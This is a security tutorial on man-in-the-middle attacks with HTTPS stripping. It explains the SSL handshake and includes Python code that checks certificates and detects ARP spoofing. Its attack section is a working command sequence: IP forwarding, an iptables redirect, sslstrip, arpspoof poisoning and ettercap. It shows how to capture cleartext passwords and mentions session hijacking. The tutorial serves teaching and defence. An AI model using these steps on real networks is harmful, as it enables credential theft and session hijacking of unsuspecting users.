Man-in-the-Middle (MitM) Attack + HTTPS strip

What is SSL and how it works:

SSL is a security protocol that provides an encrypted tunnel between the client and the server. It uses public-key cryptography with the server's public/private key pair to protect the exchange of a symmetric session key, and that session key is then used to encrypt/decrypt the transmitted data.
SSL handshake steps:

1. The client browser requests the web server's identification.

2. The server replies with a copy of its SSL certificate, including the server's public key.

3. The browser checks the certificate against its list of trusted CAs and verifies that it is unexpired, unrevoked and that its name matches the site. If the browser trusts the certificate, it creates a session key (symmetric key), encrypts it with the server's public key and sends it to the server.

4. The server decrypts the symmetric session key and sends back to the client an acknowledgement encrypted with the session key, which starts the encrypted session.

5. Server and client now encrypt all transmitted data using the symmetric session key.
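The checks the browser performs in step 3 are the part of the handshake that a MitM has to defeat, so it is worth seeing them spelled out. The following is an added example, not code from the original post: it runs the expiry, hostname and issuer checks over a constructed certificate dict in the shape Python's ssl.SSLSocket.getpeercert() returns. The certificates, CA name and "current time" are made-up sample values; the issuer check is a simplified stand-in for full chain validation, and revocation checking is not implemented (both are noted in the code).

```python
import socket
import ssl
import time
from typing import Dict, List, Optional, Sequence

# Constructed sample leaf certificate in the dict shape that
# ssl.SSLSocket.getpeercert() returns (not a real certificate).
SAMPLE_CERT: Dict = {
    "subject": ((("commonName", "www.example.org"),),),
    "issuer": ((("organizationName", "Example Trusted CA"),),
               (("commonName", "Example CA Root"),)),
    "subjectAltName": (("DNS", "www.example.org"), ("DNS", "example.org")),
    "notBefore": "Jan  1 00:00:00 2024 GMT",
    "notAfter": "Jan  1 00:00:00 2035 GMT",
}

# Constructed "bad certificate" case: right name, but issued by a CA that is
# not on the trust list (what an interposed party would have to present).
BAD_CERT: Dict = dict(SAMPLE_CERT,
                      issuer=((("commonName", "Untrusted Interceptor CA"),),))

# Fixed "current time" and trust list so the checks are reproducible offline.
SAMPLE_NOW = ssl.cert_time_to_seconds("Jun 23 05:32:54 2025 GMT")
TRUSTED_CA_NAMES = ("Example CA Root",)


def _dns_name_matches(pattern: str, hostname: str) -> bool:
    """Match a DNS name from the certificate against the requested host.
    A leading '*.' wildcard covers exactly one leftmost label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        suffix = pattern[1:]
        return hostname.endswith(suffix) and "." not in hostname[: -len(suffix)]
    return pattern == hostname


def _names(cert: Dict, field: str, key: str) -> List[str]:
    """Collect the values of `key` (e.g. commonName) from an RDN sequence."""
    return [v for rdn in cert.get(field, ()) for k, v in rdn if k == key]


def check_certificate(cert: Dict, hostname: str, now: Optional[float] = None,
                      trusted_ca_names: Sequence[str] = ()) -> List[str]:
    """Run the checks a browser performs in handshake step 3 and return the
    list of problems found (an empty list means the certificate is accepted)."""
    problems: List[str] = []
    now = time.time() if now is None else now

    # Validity period.
    if now < ssl.cert_time_to_seconds(cert["notBefore"]):
        problems.append("certificate is not yet valid")
    if now > ssl.cert_time_to_seconds(cert["notAfter"]):
        problems.append("certificate has expired")

    # Name check: subjectAltName DNS entries, falling back to the subject CN.
    names = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:
        names = _names(cert, "subject", "commonName")
    if not any(_dns_name_matches(n, hostname) for n in names):
        problems.append(f"hostname {hostname} does not match {names}")

    # Trust check, simplified: the issuer's commonName must be on the trust
    # list. A real client verifies the signature chain up to a trusted root
    # and consults CRL/OCSP for revocation; this stand-in does neither.
    issuer = _names(cert, "issuer", "commonName")
    if trusted_ca_names and not any(cn in trusted_ca_names for cn in issuer):
        problems.append(f"issuer {issuer} is not a trusted CA")
    return problems


def fetch_live_certificate(hostname: str, port: int = 443) -> Dict:
    """Connect with Python's default context, which enforces chain validation
    and hostname matching itself, and return the server's leaf certificate.
    Needs network access; the offline checks above do not use it."""
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    for label, cert in (("trusted", SAMPLE_CERT), ("bad", BAD_CERT)):
        found = check_certificate(cert, "www.example.org", SAMPLE_NOW, TRUSTED_CA_NAMES)
        print(label, "->", found or "OK")
```

Run as a script it reports the constructed trusted certificate as OK and the bad one as having an untrusted issuer; swap SAMPLE_NOW for a later time or the hostname for a different site to see the expiry and name checks fire.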



What is a Man-in-the-Middle Attack:

Sometimes called a Monkey-in-the-Middle attack, this is a type of attack in which the attacker intercepts the traffic transmitted between the client and the server, copying it in an attempt to disclose its contents, and forwards it on to the correct destination so as not to cause a denial of service (DoS) and thus not make the victims suspicious of the interception.

Attack Steps:

The steps below were carried out on the BackBox Linux distro; you may use any Linux flavour you want and install the arpspoof, sslstrip and ettercap tools on it.

1. IP forwarding:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

If that command is rejected (the shell redirect runs without root privileges), try the one below:

$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"


user@bt:~$ sudo -i
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 

2. Redirecting traffic to the port SSLstrip listens on:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234

3. Running SSLstrip:

user@bt:/pentest/web/sslstrip$ sudo python sslstrip.py -k -l 1234 -f lock.ico
  • -k: kill all currently active sessions, forcing users to log in to their websites again.
  • -l: listen port
  • -f: substitute the HTTPS lock favicon so the client believes the connection is secured

4. ARP spoofing (ARP cache poisoning) of your network using the arpspoof tool:

arpspoof -i <interface> -t <targetIP> <gatewayIP>

5. Running ettercap to capture the username and password in the clear:

ettercap -Tq -i <interface>
  • -T: runs ettercap in text mode
  • -q: quiet mode; it does not print packet content. It is useful if you want to convert a pcap file to ettercap log files.

Or you can get them from the SSLstrip log, as below:

user@bt:~$ cat /pentest/web/sslstrip/sslstrip.log
2013-06-23 05:32:54,818 SECURE POST Data (
2013-06-23 05:32:57,997 SECURE POST Data (
2013-06-23 05:33:15,696 SECURE POST Data (
Or you can do session hijacking using Hamster.

Defensive actions that should be taken by the security professional:

  • The Dynamic ARP Inspection feature can be used to protect against ARP spoofing.
  • Make sure that the lock beside the URL bar is present and its colour is green, as shown below; this makes you "slightly" sure that the connection is encrypted end-to-end (between client and server).
    • Trusted certificate examples:

Green lock – trusted certificate – Mozilla website
Green lock – trusted certificate – Gmail
  • Bad certificate example: in the following example a MITM attack occurs; the traffic is encrypted between the victim and the attacker with a certificate issued by the attacker, who decrypts the traffic, compromises it, encrypts it again with the correct certificate (issued by the trusted CA) and finally sends it to the server.
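Dynamic ARP Inspection lives on the switch; on a host or a monitoring box you can watch for the same symptom, namely a known IP address (typically the gateway) suddenly being answered for by a different MAC, or one MAC answering for several IPs. The following detector is an added example and not part of the original post: it parses ARP reply lines in the format `tcpdump -n arp` prints and raises an alert on either symptom. The capture text, addresses and MACs are constructed sample data, and the script name arp_watch.py in the usage comment is hypothetical.

```python
import re
import sys
from collections import defaultdict
from typing import Dict, Iterable, List, Optional

# Matches the ARP reply line format printed by `tcpdump -n arp`.
ARP_REPLY = re.compile(
    r"ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-fA-F:]{17})"
)

# Constructed sample capture (not real traffic): .1 is the gateway, .77 is a
# host that later starts answering ARP for the gateway's address as well.
SAMPLE_CAPTURE = """\
10:00:01.000100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:00:02.000200 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
10:00:03.000300 ARP, Reply 192.168.1.77 is-at 00:11:22:33:44:77, length 28
10:00:04.000400 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
10:00:04.000400 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:77, length 28
10:00:05.000500 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:77, length 28
"""


def detect_arp_spoofing(lines: Iterable[str],
                        pinned: Optional[Dict[str, str]] = None) -> List[str]:
    """Walk ARP replies and report two symptoms of cache poisoning:
    (a) an IP whose MAC differs from the first (or pinned) mapping seen, and
    (b) one MAC answering for more than one IP address.
    `pinned` is an ip->mac dict of mappings you trust, e.g. the gateway."""
    table: Dict[str, str] = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    claims: Dict[str, set] = defaultdict(set)   # mac -> IPs it answered for
    reported = set()                             # (ip, mac) pairs already alerted
    alerts: List[str] = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue                             # requests and other lines are ignored
        ip, mac = m.group(1), m.group(2).lower()
        claims[mac].add(ip)
        expected = table.setdefault(ip, mac)     # first mapping wins unless pinned
        if expected != mac and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append(f"MAC change for {ip}: expected {expected}, saw {mac}")
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append(f"{mac} answered for multiple IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    # Live use (alerts are reported when the capture ends):
    #   tcpdump -n -l -i <interface> arp | python3 arp_watch.py
    # Without piped input the constructed sample capture is scanned instead.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_CAPTURE.splitlines()
    for alert in detect_arp_spoofing(source):
        print("ALERT:", alert)
```

Pinning the gateway's real MAC (the `pinned` argument) is the important part for a host: without it, the detector trusts whichever reply arrives first, which is exactly the race a poisoner wins on a freshly booted machine.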
